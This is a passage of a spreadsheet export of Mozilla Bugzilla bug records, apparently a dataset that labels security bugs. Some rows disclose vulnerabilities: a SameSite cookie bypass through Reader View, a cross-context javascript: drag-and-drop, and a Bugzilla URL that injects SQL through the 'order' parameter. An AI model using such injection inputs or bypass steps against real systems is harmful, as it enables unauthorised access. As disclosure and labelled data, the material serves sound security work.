      <c r="L4247" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4247" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4247" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main100+][adv-esr91.9+]</t>
        </is>
      </c>
      <c r="Q4247" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4247" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S4247" t="inlineStr">
        <is>
          <t>100 Branch</t>
        </is>
      </c>
      <c r="T4247" t="n">
        <v>1</v>
      </c>
      <c r="U4247" t="n">
        <v>0</v>
      </c>
      <c r="V4247" t="n">
        <v>62</v>
      </c>
      <c r="W4247" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Steps to reproduce:
1. Go to https://abrasax.club/readcookie.html
2. Click anywhere in the page to open another tab.
3. Click in Reader View icon.
3. Wait 15 seconds until the new tab is redirected to about:blank
4. Wait 4 seconds more to be redirected back to Reader View.
5. Reader View will render meta redirect page and SameSite cookie will be bypassed.
Actual results:
SameSite cookie is sent when Reader View is reloaded with a meta redirect.
Expected results:
SameSite cookie not sent.</t>
        </is>
      </c>
      <c r="X4247" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4248">
      <c r="A4248" t="n">
        <v>677684</v>
      </c>
      <c r="B4248" t="inlineStr">
        <is>
          <t>2011-08-09 14:02:11 -0700</t>
        </is>
      </c>
      <c r="C4248" t="inlineStr">
        <is>
          <t>Database change deployment and backfill process for 2.2</t>
        </is>
      </c>
      <c r="D4248" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E4248" t="n">
        <v>1</v>
      </c>
      <c r="F4248" t="n">
        <v>1</v>
      </c>
      <c r="G4248" t="n">
        <v>4</v>
      </c>
      <c r="H4248" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4248" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4248" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4248" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4248" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4248" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4248" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4248" t="inlineStr"/>
      <c r="Q4248" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4248" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4248" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4248" t="n">
        <v>1</v>
      </c>
      <c r="U4248" t="n">
        <v>0</v>
      </c>
      <c r="V4248" t="n">
        <v>6</v>
      </c>
      <c r="W4248" t="inlineStr">
        <is>
          <t>Instructions for deploying PostgreSQL database changes are as follows:
Updating Database Objects for the 2.2 Release
----------------------------------------------
Updated as of 2011-08-09 14:00
Unlike the releases since 1.7.7, many of the steps in the 2.2 release involve a lot of backfilling.  As such, they need to be deployed over the course of at least a day before 2.2 goes live.  As such, the complex documentation.
In generally, "backfill" means to populate (or in a few cases re-populate) data back to 4/17, which is approximately when we began dealing with the new releases.
upgrade.sh
----------
Because of the backfilling, upgrade.sh for this release is not really feasible to just run.  It's provided here more as an example of the order of execution for the various scripts.
1. release_channel
------------------
All of the release_channel upgrading below has already been run on DevDB, StageDB, and Master01.  It does not need to be run again.
add_releasechannel.py : 
	adds the release_channel column to reports
releasechannel_backfill.py : 
	populates the releasechannel from a CSV file.  updating reports using this script did not work in performance
releasechannel_backfill-dev.py :
	same as above, except for dev only, and backfilling ony a few days
	this does work for backfilling a dev instance
update_releasechannel.py : 
	semifinal script for updating releasechannel in production.
	has already been run.
2. raw_adu.sql
--------------
Adds two new columns to the raw_adu table.  Has already been applied in production.  After this is applied, then Metrics needs to actually backfill the new version of the table, which they have already begun doing.
Since Metrics can only backfill Prod and StageDB, the way to populate a dev instance is to copy the raw_adu table from StageDB.
3. releases_raw.sql
-------------------
Creates a new table to hold FTP-scraping information.  After it is installed, Robert Helmer needs to backfill the data for this table before proceeding past step 5. 
Table installed on Stage but not Prod.
4. support_functions.sql
------------------------
Creates a whole slew of tiny database functions, most of them meant for formatting various kinds of data or doing comparisons between different data types.  Should run very quickly.
5. new_tcbs_tables.sql
-----------------------
Creates a large number of new tables and views to support the new release data.  Note that the current file may not be in proper dependency order due to heavy editing; needs repeated testing on a clean database.
6. product_migration.sql
-------------------------
Populates all of the new product tables and creates the cronjob function which updates them daily.  Backfilling on this is light and should not take very long.
NOTE: releases_raw needs to be populated first.
7. os_migration.sql
--------------------
Fills in OS and OS version information.  Creates function for maintaining os-version data.  Backfill should be fast.
8. signature_migration.sql
--------------------------
Fills in all signature-product information, and creates the function for maintaining signature information and rollups.  Backfill will take a while.
9. daily_adu.sql
----------------
Fills in product_adu with backfill data, which includes both old and new products.  Creates function for maintaining this data.
NOTE: requires new columns on raw_adu to be populated first.
NOTE: you should time-limit the backfill code for Dev/Stage or it won't complete.
10. update_tcbs.sql
-------------------
Creates function for backfilling/maintaining the new "tcbs" table.  Backfills the table.
NOTE: you need to time-limit the backfill on Stage/Dev or it will take way too long.
11. daily_crashes.sql 
---------------------
Creates function for maintaining daily_crashes table using a mixture of old and new data crashes.  Executes procudure in a loop to backfill.
NOTE: backfill should be time-limited on stage and dev.
NOTE: backfill can cause locking; watch the backfill process and
	abort if it's blocking.
12. edit_product_info.sql
-------------------------
Creates function for editing productdims and product_version, for the admin interface.  No backfill.</t>
        </is>
      </c>
      <c r="X4248" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4249">
      <c r="A4249" t="n">
        <v>454872</v>
      </c>
      <c r="B4249" t="inlineStr">
        <is>
          <t>2008-09-11 13:22:02 -0700</t>
        </is>
      </c>
      <c r="C4249" t="inlineStr">
        <is>
          <t>Crashes while scrolling [@ nsScrollPortView::IncrementalScroll()]</t>
        </is>
      </c>
      <c r="D4249" t="inlineStr">
        <is>
          <t>2022-03-24 00:29:16 -0700</t>
        </is>
      </c>
      <c r="E4249" t="n">
        <v>1</v>
      </c>
      <c r="F4249" t="n">
        <v>1</v>
      </c>
      <c r="G4249" t="n">
        <v>3</v>
      </c>
      <c r="H4249" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4249" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4249" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K4249" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4249" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4249" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4249" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4249" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4249" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4249" t="n">
        <v>1</v>
      </c>
      <c r="U4249" t="n">
        <v>0</v>
      </c>
      <c r="V4249" t="n">
        <v>42</v>
      </c>
      <c r="W4249" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Yesterday set preferences to "Use smooth scrolling" (unchecked "Use Autoscrolling). Today multiple crashes while attempting to scroll. Seems much worse when attempting to scroll while page is loading/reloading, but sometimes happens even when page is loaded.
Reset to "Use Autoscrolling"; now seems stable again.
Reproducible: Sometimes
Steps to Reproduce:
1.See above.
2.
3.
Actual Results:  
See above.
If I can help with any testing or provide additional info, please advise.</t>
        </is>
      </c>
      <c r="X4249" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4250">
      <c r="A4250" t="n">
        <v>993926</v>
      </c>
      <c r="B4250" t="inlineStr">
        <is>
          <t>2014-04-09 00:26:12 -0700</t>
        </is>
      </c>
      <c r="C4250" t="inlineStr">
        <is>
          <t>Bugzilla::User::Setting::get_all_settings() should use memcached</t>
        </is>
      </c>
      <c r="D4250" t="inlineStr">
        <is>
          <t>2014-08-11 23:05:51 -0700</t>
        </is>
      </c>
      <c r="E4250" t="n">
        <v>1</v>
      </c>
      <c r="F4250" t="n">
        <v>1</v>
      </c>
      <c r="G4250" t="n">
        <v>4</v>
      </c>
      <c r="H4250" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4250" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4250" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4250" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4250" t="inlineStr"/>
      <c r="Q4250" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4250" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4250" t="inlineStr">
        <is>
          <t>Bugzilla 5.0</t>
        </is>
      </c>
      <c r="T4250" t="n">
        <v>1</v>
      </c>
      <c r="U4250" t="n">
        <v>0</v>
      </c>
      <c r="V4250" t="n">
        <v>3</v>
      </c>
      <c r="W4250" t="inlineStr">
        <is>
          <t>due to the gravatar extension on BMO, $user-&gt;settings() is called for each commenter.  this results in frequent database calls for data that changes very infrequently, making it an ideal candidate for memcached.
changes required:
- during an update in editsettings.cgi call Bugzilla-&gt;memcached-&gt;clear_config()
- update Bugzilla::User::Settings:
  - update get_all_settings($user_id)
    - build a cache key as "user_settings.$user_id"
    - check the cache with Bugzilla-&gt;memcached-&gt;get_config($key) and return if found
    - if not found, query the database and store with memcached-&gt;set_config()
  - add a method clear_settings_cache($user_id)
    - calls memcached-&gt;clear({ key =&gt; $key }) using the same key as get_all_settings()
- call clear_settings_cache() from userprefs.cgi::SaveSettings()
i'm not totally comfortable with clear_settings_cache(), however the way settings have been implemented makes abstraction difficult (the settings hashref inside the user object is updated directly by userprefs.cgi, and using a tied hashref would be an overkill).</t>
        </is>
      </c>
      <c r="X4250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4251">
      <c r="A4251" t="n">
        <v>490790</v>
      </c>
      <c r="B4251" t="inlineStr">
        <is>
          <t>2009-04-30 01:32:29 -0700</t>
        </is>
      </c>
      <c r="C4251" t="inlineStr">
        <is>
          <t>XMLDocument::load() doesn't check nsIContentPolicy</t>
        </is>
      </c>
      <c r="D4251" t="inlineStr">
        <is>
          <t>2014-08-22 12:42:48 -0700</t>
        </is>
      </c>
      <c r="E4251" t="n">
        <v>1</v>
      </c>
      <c r="F4251" t="n">
        <v>1</v>
      </c>
      <c r="G4251" t="n">
        <v>3</v>
      </c>
      <c r="H4251" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4251" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4251" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K4251" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4251" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4251" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4251" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4251" t="inlineStr">
        <is>
          <t>[sg:low+]</t>
        </is>
      </c>
      <c r="Q4251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4251" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4251" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4251" t="n">
        <v>1</v>
      </c>
      <c r="U4251" t="n">
        <v>0</v>
      </c>
      <c r="V4251" t="n">
        <v>16</v>
      </c>
      <c r="W4251" t="inlineStr">
        <is>
          <t>nsXMLDocument::load() will do same-origin checks on the URL to be loaded but won't check content policies. I think it should call content policies with TYPE_XMLHTTPREQUEST and use calling document as context.</t>
        </is>
      </c>
      <c r="X4251" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4252">
      <c r="A4252" t="n">
        <v>517402</v>
      </c>
      <c r="B4252" t="inlineStr">
        <is>
          <t>2009-09-17 22:12:02 -0700</t>
        </is>
      </c>
      <c r="C4252" t="inlineStr">
        <is>
          <t>Homepage link columns reversed</t>
        </is>
      </c>
      <c r="D4252" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E4252" t="n">
        <v>1</v>
      </c>
      <c r="F4252" t="n">
        <v>1</v>
      </c>
      <c r="G4252" t="n">
        <v>6</v>
      </c>
      <c r="H4252" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4252" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4252" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K4252" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L4252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4252" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4252" t="inlineStr"/>
      <c r="Q4252" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4252" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4252" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="T4252" t="n">
        <v>1</v>
      </c>
      <c r="U4252" t="n">
        <v>0</v>
      </c>
      <c r="V4252" t="n">
        <v>9</v>
      </c>
      <c r="W4252" t="inlineStr">
        <is>
          <t>Some check-in today swapped the two link columns on the homepage. Learn &amp; Explore should be on the left.
Are you trying to see if I'd notice?!?!?!</t>
        </is>
      </c>
      <c r="X4252" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4253">
      <c r="A4253" t="n">
        <v>1347262</v>
      </c>
      <c r="B4253" t="inlineStr">
        <is>
          <t>2017-03-14 12:15:45 -0700</t>
        </is>
      </c>
      <c r="C4253" t="inlineStr">
        <is>
          <t>Potential Skia overflow due to round_asymmetric_to_int bug</t>
        </is>
      </c>
      <c r="D4253" t="inlineStr">
        <is>
          <t>2017-09-21 12:42:48 -0700</t>
        </is>
      </c>
      <c r="E4253" t="n">
        <v>1</v>
      </c>
      <c r="F4253" t="n">
        <v>1</v>
      </c>
      <c r="G4253" t="n">
        <v>3</v>
      </c>
      <c r="H4253" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4253" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4253" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4253" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L4253" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4253" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4253" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4253" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q4253" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4253" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4253" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4253" t="n">
        <v>1</v>
      </c>
      <c r="U4253" t="n">
        <v>0</v>
      </c>
      <c r="V4253" t="n">
        <v>12</v>
      </c>
      <c r="W4253" t="inlineStr">
        <is>
          <t>Upstream Skia security bug (https://bugs.chromium.org/p/skia/issues/detail?id=6294) details a variant of bug 1330166 that was not handled by that fix. All relevant security details of this bug should basically be the same as in bug 133016, just that this is a new way to trigger it. I've fixed up that case now with this patch that ensures the rounding is properly biased for all sides of the bounds rect.
This patch was submitted upstream here: https://skia-review.googlesource.com/c/9700/</t>
        </is>
      </c>
      <c r="X4253" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4254">
      <c r="A4254" t="n">
        <v>278414</v>
      </c>
      <c r="B4254" t="inlineStr">
        <is>
          <t>2005-01-14 10:41:27 -0800</t>
        </is>
      </c>
      <c r="C4254" t="inlineStr">
        <is>
          <t>Cannot add 'cc' notification for Flags when using emailsuffixes</t>
        </is>
      </c>
      <c r="D4254" t="inlineStr">
        <is>
          <t>2005-12-13 13:39:38 -0800</t>
        </is>
      </c>
      <c r="E4254" t="n">
        <v>1</v>
      </c>
      <c r="F4254" t="n">
        <v>1</v>
      </c>
      <c r="G4254" t="n">
        <v>4</v>
      </c>
      <c r="H4254" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4254" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4254" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K4254" t="inlineStr">
        <is>
          <t>2.18</t>
        </is>
      </c>
      <c r="L4254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4254" t="inlineStr"/>
      <c r="Q4254" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4254" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4254" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4254" t="n">
        <v>1</v>
      </c>
      <c r="U4254" t="n">
        <v>0</v>
      </c>
      <c r="V4254" t="n">
        <v>11</v>
      </c>
      <c r="W4254" t="inlineStr">
        <is>
          <t>When using e-mail suffixes to append @host.com to e-mail addresses, one cannot
add an e-mail address (email@host.com) to the CC list for a Flag.
One gets the error:
&lt;bright red&gt;
The e-mail address you entered (email@host.com) didn't pass our syntax checking
for a legal email address. Enter only the username (the @host.com will be
appended). It must also not contain any of these special characters: \ ( ) &amp; &lt; &gt;
, ; : " [ ], or any whitespace.
&lt;/bright red&gt;
in editflagtypes.cgi, sub validateCCList, there's the line:
    foreach my $address (@addresses) { CheckEmailSyntax($address) }
CheckEmailSyntax checks against the parameter "emailregexp", which rejects
"email@host.com".
According to the documentation, we allow arbitrary CC lists for Flags, so
"email@host.com" should be valid.
If we allow arbitrary CC lists for Flags (why *do* we do that for flags but not
for normal CC lists?) then we will need a seperate way to validate the CC e-mail
addresses.</t>
        </is>
      </c>
      <c r="X4254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4255">
      <c r="A4255" t="n">
        <v>280056</v>
      </c>
      <c r="B4255" t="inlineStr">
        <is>
          <t>2005-01-27 09:28:03 -0800</t>
        </is>
      </c>
      <c r="C4255" t="inlineStr">
        <is>
          <t>When dropping a javascript link to a tab, the script runs in the security context of the site currently displayed in the tab</t>
        </is>
      </c>
      <c r="D4255" t="inlineStr">
        <is>
          <t>2020-12-01 02:21:23 -0800</t>
        </is>
      </c>
      <c r="E4255" t="n">
        <v>1</v>
      </c>
      <c r="F4255" t="n">
        <v>1</v>
      </c>
      <c r="G4255" t="n">
        <v>3</v>
      </c>
      <c r="H4255" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4255" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4255" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K4255" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4255" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4255" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4255" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4255" t="inlineStr">
        <is>
          <t>[sg:fix] need approvals</t>
        </is>
      </c>
      <c r="Q4255" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4255" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4255" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4255" t="n">
        <v>1</v>
      </c>
      <c r="U4255" t="n">
        <v>0</v>
      </c>
      <c r="V4255" t="n">
        <v>18</v>
      </c>
      <c r="W4255" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
The javascript security manager usually prevents that a javascript: URL from one
host is opened in a window displaying content from another host. But when the
link is dropped to a tab the security manager does not kick in. Probably it is
treated like the javascript: URL was typed by the user - which also does not
trigger the security manager check. 
Reproducible: Always
Steps to Reproduce:
1. Open http://www.mikx.de/firetabbing/
2. Drop the example links to other tabs
Actual Results:  
The scripts are running in the security context of the site currently displayed
in the tab
Expected Results:  
The script should run in its own security context (e.g. about:blank) or the
javascript security manager should kick in (just like it does when you try a
window.location='javascript:' across different hosts).
Tabbed browsing is a great feature to organize mutliple website, but after a
while also tabs become too much. Now you have two options: Close tabs and open
new ones (CTRL+W to close a tab, followed by a CTRL+click on a link to open a
new one), or just recycle already open tabs by dragging links to them - the
solution i prefer.
Dropping links to tabs containing other websites is a common workflow. Well, at
least to me ;)</t>
        </is>
      </c>
      <c r="X4255" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4256">
      <c r="A4256" t="n">
        <v>1361681</v>
      </c>
      <c r="B4256" t="inlineStr">
        <is>
          <t>2017-05-03 03:27:21 -0700</t>
        </is>
      </c>
      <c r="C4256" t="inlineStr">
        <is>
          <t>[UX] Preferences Reorg UX Spec</t>
        </is>
      </c>
      <c r="D4256" t="inlineStr">
        <is>
          <t>2017-07-06 00:14:07 -0700</t>
        </is>
      </c>
      <c r="E4256" t="n">
        <v>1</v>
      </c>
      <c r="F4256" t="n">
        <v>1</v>
      </c>
      <c r="G4256" t="n">
        <v>2</v>
      </c>
      <c r="H4256" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4256" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4256" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K4256" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L4256" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4256" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4256" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4256" t="inlineStr">
        <is>
          <t>[photon-preference][ux]</t>
        </is>
      </c>
      <c r="Q4256" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4256" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4256" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4256" t="n">
        <v>1</v>
      </c>
      <c r="U4256" t="n">
        <v>0</v>
      </c>
      <c r="V4256" t="n">
        <v>5</v>
      </c>
      <c r="W4256" t="inlineStr">
        <is>
          <t>Please see the UX spec for Preferences reorganization: https://mozilla.invisionapp.com/share/P4ACQT1E3#/217167559_1-0_Cover</t>
        </is>
      </c>
      <c r="X4256" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4257">
      <c r="A4257" t="n">
        <v>130821</v>
      </c>
      <c r="B4257" t="inlineStr">
        <is>
          <t>2002-03-14 00:51:57 -0800</t>
        </is>
      </c>
      <c r="C4257" t="inlineStr">
        <is>
          <t>buglist: "order" parameter sends unchecked SQL</t>
        </is>
      </c>
      <c r="D4257" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E4257" t="n">
        <v>1</v>
      </c>
      <c r="F4257" t="n">
        <v>1</v>
      </c>
      <c r="G4257" t="n">
        <v>4</v>
      </c>
      <c r="H4257" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4257" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4257" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4257" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4257" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4257" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4257" t="inlineStr">
        <is>
          <t>checked in for 2.14.2. security</t>
        </is>
      </c>
      <c r="Q4257" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4257" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4257" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4257" t="n">
        <v>1</v>
      </c>
      <c r="U4257" t="n">
        <v>0</v>
      </c>
      <c r="V4257" t="n">
        <v>32</v>
      </c>
      <c r="W4257" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/buglist.cgi?field0-0-0=reporter&amp;type0-0-0=substring&amp;value0-0-0=jrud&amp;order=bugs.bug_id%20AND%20ALLYOURBASEAREBELONGTOUS
SQL Error:
...
GROUP BY bugs.bug_id ORDER BY bugs.bug_id AND ALLYOURBASEAREBELONGTOUS: Unknown
column 'ALLYOURBASEAREBELONGTOUS' in 'order clause' at globals.pl line 222.
I noticed this at b.m.o and didn't test bugzilla-tip because landfill is down.</t>
        </is>
      </c>
      <c r="X4257" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4258">
      <c r="A4258" t="n">
        <v>1659</v>
      </c>
      <c r="B4258" t="inlineStr">
        <is>
          <t>1998-11-25 13:18:56 -0800</t>
        </is>
      </c>
      <c r="C4258" t="inlineStr">
        <is>
          <t>buglist.cgi has mismatched case for server push break string</t>
        </is>
      </c>
      <c r="D4258" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:19 -0800</t>
        </is>
      </c>
      <c r="E4258" t="n">
        <v>1</v>
      </c>
      <c r="F4258" t="n">
        <v>1</v>
      </c>
      <c r="G4258" t="n">
        <v>4</v>
      </c>
      <c r="H4258" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4258" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4258" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4258" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4258" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4258" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4258" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4258" t="inlineStr"/>
